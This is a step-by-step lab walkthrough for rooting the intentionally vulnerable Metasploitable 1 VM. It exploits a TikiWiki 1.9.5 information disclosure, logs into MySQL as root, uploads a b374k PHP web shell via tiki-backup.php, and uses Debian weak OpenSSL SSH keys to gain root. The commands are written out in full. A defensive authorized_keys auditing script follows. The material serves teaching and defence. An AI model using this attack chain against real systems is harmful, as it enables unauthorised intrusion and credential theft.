#HackOnTuesday Episode 1 Metasploitable 1 – TikiWiki

Metasploitable is a vulnerable VM created to practice common penetration testing techniques. In this episode of #HackOnTuesday, Gianni shows how to discover hidden directories and files on a webserver, how to exploit an information disclosure in TikiWiki 1.9.5 and get critical information about the database, how to find misconfigurations in the system, and last but not least how to retrieve a private SSH key and get root access on the Metasploitable VM.

Tools, Scripts, and Exploits

The tools, scripts, and exploits used in this episode of #HackOnTuesday are:

» nmap (https://nmap.org/)
» DirBuster (https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)
» TikiWiki 1.9.5 Sirius – (sort_mode) Information Disclosure (https://www.exploit-db.com/exploits/2701/)
» b374k (https://github.com/b374k/b374k)
» SSH 2048-bit RSA Keys X86 (https://hdm.io/tools/debian-openssl/)
» Lynis (https://cisofy.com/lynis/)

Steps

» Fire up the Metasploitable 1 virtual machine.
» Get the IP address of the Metasploitable 1 VM
   • /sbin/ifconfig # Get the IP of your machine
   • nmap -sn 192.168.75.0/24 # Scan the network
» Open a terminal on your machine and scan the VM
   • nmap -v -Pn -sT 192.168.75.149 -p1-65535 -oX meta.xml
» Open a new terminal and run DirBuster
   • java -jar DirBuster-0.12.jar
» Analyze the output of DirBuster and open tikiwiki/ on the browser
» Look for the version of TikiWiki
» Search for an exploit or vulnerability on CVE Details and Exploit DB.
» Select the TikiWiki 1.9.5 Sirius – (sort_mode) Information Disclosure advisory.
» Open the first URL from the advisory in your browser and search for the term “database”.
   • http://192.168.75.149/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
» Use the credentials found in the previous step to connect to the MySQL database
   • mysql -h 192.168.75.149 -u root -p
   • Type “root” as password.
» Inspect the database for sensitive information.
   • SHOW DATABASES;
   • USE tikiwiki195;
   • SHOW TABLES;
   • SHOW COLUMNS FROM tiki_users;
   • SELECT * FROM tiki_users;
   • SELECT * FROM users_users;
» Log into the TikiWiki Dashboard using the credentials found (admin/admin)
» Look around for interesting places to upload a shell.
   • http://192.168.75.149/tikiwiki/tiki-backup.php
» Create a PHP shell.
   • php -f index.php -- -o shell.php -p password -s -b -z gzcompress -c 9
» Upload shell.php and go to /tikiwiki/backups/shell.php
» Get some information about the system.
   • uname -a
   • whoami
» Upload Lynis package via tiki-backup.php
» Extract and run lynis on the VM
   • tar xvf lynis-2.3.4.tar.gz
   • cd lynis
   • ls -l
   • ./lynis audit system
   • Find the “File Permissions” section or look for “.ssh”
» Look for accessible .ssh folders in the VM
   • find / -name ".ssh" -type d 2>&1 | grep -v "Permission denied"
   • ls -l /root/.ssh
» Exfiltrate authorized_keys file.
   • cat /root/.ssh/authorized_keys
» Get the private key to access the SSH service
   • tar xvf debian_ssh_rsa_2048_x86.tar.bz2
   • grep -r -l "AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6s" rsa/
   • chmod 600 rsa/2048/57c3115d77c56390332dc5c49978627a-5429
   • ssh -i rsa/2048/57c3115d77c56390332dc5c49978627a-5429 root@192.168.75.149
» Game over!!

NOTE: Older versions of Debian and Ubuntu shipped an OpenSSL package with a bug in its random number generator: the only entropy left was the process ID, so the SSH keys the library generated depended on the PID alone. Learn more about this vulnerability here: https://hdm.io/tools/debian-openssl.
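The defender-side counterpart of the last steps, added here as an example and not part of the original episode: an audit of an authorized_keys file that computes each key's OpenSSH fingerprint and flags entries listed in a blacklist of known-weak fingerprints (in the spirit of Debian's ssh-vulnkey), plus RSA keys shorter than 2048 bits and malformed lines. The blacklist and the key material below are constructed placeholders, not real keys.

```python
import base64, hashlib, struct

def ssh_string(b: bytes) -> bytes:  # SSH wire-format string: 4-byte big-endian length + bytes
    return struct.pack(">I", len(b)) + b
def rsa_blob(e: int, n: int) -> bytes:  # encode an ssh-rsa public key blob (builds the samples)
    def mpint(x: int) -> bytes:  # positive mpint: leading zero byte when the top bit is set
        return ssh_string(x.to_bytes((x.bit_length() + 8) // 8, "big"))
    return ssh_string(b"ssh-rsa") + mpint(e) + mpint(n)
def blob_fields(blob: bytes) -> list:  # split a blob into its wire-format string fields
    fields, off = [], 0
    while off + 4 <= len(blob):
        (ln,) = struct.unpack_from(">I", blob, off)
        fields.append(blob[off + 4:off + 4 + ln])
        off += 4 + ln
    return fields
def fingerprint(blob: bytes) -> str:  # OpenSSH style: SHA-256 of the blob, unpadded base64
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")

def audit_authorized_keys(text: str, weak: set) -> list:
    # Returns (line, verdict, fingerprint) per key line: 'weak' if the fingerprint is
    # blacklisted, 'short' for RSA under 2048 bits, 'malformed' if unparsable, else 'ok'.
    out = []
    for no, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # options such as no-pty may precede the key type, so locate the type field first
        idx = next((i for i, p in enumerate(parts) if p.startswith(("ssh-", "ecdsa-"))), None)
        try:
            blob = base64.b64decode(parts[idx + 1], validate=True)
            fields = blob_fields(blob)
            if fields[0].decode() != parts[idx]:
                raise ValueError("key type inside the blob does not match the text field")
        except (TypeError, ValueError, IndexError):  # no type field, bad base64, truncated blob
            out.append((no, "malformed", None)); continue
        fp, verdict = fingerprint(blob), "ok"
        if fp in weak:
            verdict = "weak"
        elif parts[idx] == "ssh-rsa" and int.from_bytes(fields[2], "big").bit_length() < 2048:
            verdict = "short"
        out.append((no, verdict, fp))
    return out

# Constructed sample: placeholder moduli (not real keys), one option-prefixed line, one corrupt line
N_WEAK, N_OK, N_SHORT = (1 << 2047) | 0x10001, (1 << 2047) | 3, (1 << 1023) | 1
def key_line(n: int, comment: str, opts: str = "") -> str:
    return f"{opts}ssh-rsa {base64.b64encode(rsa_blob(65537, n)).decode()} {comment}"
SAMPLE = "\n".join(["# constructed authorized_keys sample", key_line(N_WEAK, "root@debian"),
                    key_line(N_OK, "ops@workstation", "no-pty "), key_line(N_SHORT, "legacy@host"),
                    "ssh-rsa not-base64!!! broken@host"])
WEAK_FINGERPRINTS = {fingerprint(rsa_blob(65537, N_WEAK))}  # stands in for the real blacklist
```

Run it against a real file by reading its contents into `audit_authorized_keys` together with a fingerprint set built from an actual weak-key blacklist; any 'weak' verdict means the key must be replaced, not just removed from one host.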